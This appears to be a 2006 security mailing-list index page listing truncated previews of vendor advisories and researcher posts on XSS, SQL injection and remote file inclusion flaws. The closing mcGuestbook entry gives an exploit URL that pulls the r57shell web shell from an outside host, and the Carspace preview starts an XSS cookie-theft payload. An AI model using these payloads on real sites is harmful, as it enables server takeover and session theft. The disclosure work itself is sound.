|
|
Colapse all |
Post message
[ MDKSA-2006:105 ] - Updated kdebase packages fix local vulnerability in kdm 2006-06-15 security mandriva com PHP security (or the lack thereof) 2006-06-16 Darren Reed (avalon caligula anu edu au) From my own mail archives, PHP appears to make up at least 4% of the email to bugtraq I see - or over 1000 issues since 1995, out of the 25,000 I have saved. People complain about applications like sendmail...in the same period, it has been resopnsible for less than 200. Do we have a new contende [ more ] [ reply ] Cisco Secure ACS Cross Site Scripting Vulnerability. 2006-06-15 liam romanis uk fujitsu com FUJITSU SERVICES SECURITY ADVISORY DATE: 27-01-2006 AUTHOR: THOMAS LIAM ROMANIS VENDOR: Cisco PRODUCT: Cisco Secure ACS VERSION(S) TESTED: Cisco Secure ACS version 2.3 UNIX hosted on Netscape FastTrack Server version 2.01c on Sun Solaris 8.0 TITLE: Cisco Secure ACS LogonProxy.cgi Cross Site Sc [ more ] [ reply ] Calendarix 0.7.20060401, SQL Injection Vulnerabilities 2006-06-15 Federico Fazzi (federico autistici org) ----------------------------------------------------- Advisory id: FSA:018 Author: Federico Fazzi Date: 15/06/2006, 23:36 Sinthesis: Calendarix 0.7.20060401, SQL Injection Vulnerabilities Type: low Product: http://www.calendarix.com/ Patch: unavailable -------------------------------- [ more ] [ reply ] Carspace.com - XSS with cookie disclosure 2006-06-15 luny youfucktard com Carspace.com Homepage: http://www.carspace.com Affected files: Input boxes of registering Login boxes sending mail input boxes. Searching for photos. XSS vuln with cookie disclosure via ErrorMessage when registering: http://www.carspace.com/?register@@!ErrorMessage=<br><SCRIPT SRC=htt [ more ] [ reply ] Ji-takz Chat (mycfg) Remote File Inclusion 2006-06-16 SpC-x Bsdmail Org ###################################################### # Ji-takz Chat (mycfg) Remote File Inclusion ###################################################### # Credit : SpC-x # Site : http://wWw.SaVSaK.CoM ###################################################### # Greetz : # | Liz0ziM | Ejder | Fa [ more ] [ reply ] Re: [FSA016] ISPConfig 2.2.3, File inclusion vulnerability 2006-06-16 t brehm ispconfig org Thank you for posting your ISPConfig code review. The posted proof of concept exploit does not affect any ISPConfig installation. Explanation: There is one thing that you did not took in account while reviewing the sources: You reviewed the installation tarball that is not identical with [ more ] [ reply ] Re: Several flaws in e-business designer (eBD) 2006-06-16 ebd soporte oasyssoft com A Bug in the eBD HTML editor has been discovered. It will allow an user to modify the images of the /imgfiles folder (the files raised in the option resources > images). Oasyssoft, the producer, has installed the patch in all our servers, so all MyeBD users are updated since the end of may. [ more ] [ reply ] Develooping Flash Chat (banned_file) Remote File Inclusion 2006-06-16 SpC-x Bsdmail Org ###################################################### # Develooping Flash Chat (banned_file) Remote File Inclusion ###################################################### # Credit : SpC-x # Site : http://wWw.SaVSaK.CoM ###################################################### # Greetz : # | Liz0 [ more ] [ reply ] Indexu v 5.0.01 Multiple Remote File Include Vulnerabilities 2006-06-16 KARKOR23 hotmail com Discovered By CrAsh_oVeR_rIdE indexu remote file include -------------------------- site of script:http://www.nicecoder.com/ ------------------------------------------------- Vulnerable: INDEXU v5.0.1 file include ------------ include($admin_template_path."msg.php"); admin_template_path p [ more ] [ reply ] [USN-303-1] MySQL vulnerability 2006-06-16 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-303-1 June 16, 2006 mysql-dfsg-4.1, mysql-dfsg-5.0 vulnerability CVE-2006-2753 =========================================================== A security issue affects the following Ubuntu releases: Ub [ more ] [ reply ] dvdwolf SQL injection/XSS 2006-06-16 CrAzY CrAcKeR hotmail com ============================================= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r ============================================= Example:- /templates/dsp_movie.php [ more ] [ reply ] aXentForum II XSS vuLLn 2006-06-16 SnoBmsn hotmail de vendor:http://www.axent.us/axentforum.cfm affected versions:aXentForum II and prior aXentForum II contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "viewposts.cfm" isn't properly sanitised before being returned to the user. This can be [ more ] [ reply ] [security bulletin] HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS) 2006-06-16 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00657001 Version: 1 HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS) NOTICE: The information in this Security Bulletin should b [ more ] [ reply ] rPSA-2006-0105-1 arts 2006-06-15 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0105-1 Published: 2006-06-15 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Local Root Non-deterministic Privilege Escalation Updated Versions: arts=/conary.rpath.com@rpl:devel//1/1.4.2-1.4-1 References: http://www.cve.mitre.org/cgi-bi [ more ] [ reply ] HotPlugCMS 1.0, Cross-Site Scripting Vulnerabilities 2006-06-15 Federico Fazzi (federico autistici org) ----------------------------------------------------- Advisory id: FSA:017 Author: Federico Fazzi Date: 15/06/2006, 20:31 Sinthesis: HotPlugCMS 1.0, Cross-Site Scripting Vulnerabilities Type: low Product: http://hotplugcms.com/ Patch: unavailable -------------------------------------- [ more ] [ reply ] rPSA-2006-0106-1 kdebase 2006-06-15 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0106-1 Published: 2006-06-15 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Root Deterministic Information Exposure Updated Versions: kdebase=/conary.rpath.com@rpl:devel//1/3.4.2-3.11-1 References: http://www.cve.mitre.org/cgi-bi [ more ] [ reply ] [ GLSA 200606-19 ] Sendmail: Denial of Service 2006-06-15 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Regarding "SMB Invalid Handle Value" - MS06-030. Vulnerability not fixed. 2006-06-15 Reversemode (advisories reversemode com) Hi, Just to confirm that Microsoft has not fixed the NtClose/ZwClose DeadLock vulnerability. The bulletin MS06-030 addressed this flaw as "SMB Invalid Handle Value" which is just an euphemism under my point of view. The code added to mrxsmb.sys is just a wrapper in order to avoid the "Invalid Ha [ more ] [ reply ] [ GLSA 200606-17 ] OpenLDAP: Buffer overflow 2006-06-15 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200606-18 ] PAM-MySQL: Multiple vulnerabilities 2006-06-15 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [USN-297-2] Thunderbird extensions update for recent security update 2006-06-15 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-297-2 June 15, 2006 mozilla-thunderbird, thunderbird-quickfile updates =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.0 [ more ] [ reply ] Andys Chat 4.5 (action) Remote File Inclusion 2006-06-15 SpC-x Bsdmail Org ###################################################### # Andys Chat 4.5 (action) Remote File Inclusion ###################################################### # Credit : SpC-x # Site : http://wWw.SaVSaK.CoM ###################################################### # Greetz : # | Liz0ziM | Ejder | [ more ] [ reply ] |
|
Privacy Statement |
script type : mcGuestbook 1.3
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
admin.php
http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?
ecr
[ more ] [ reply ]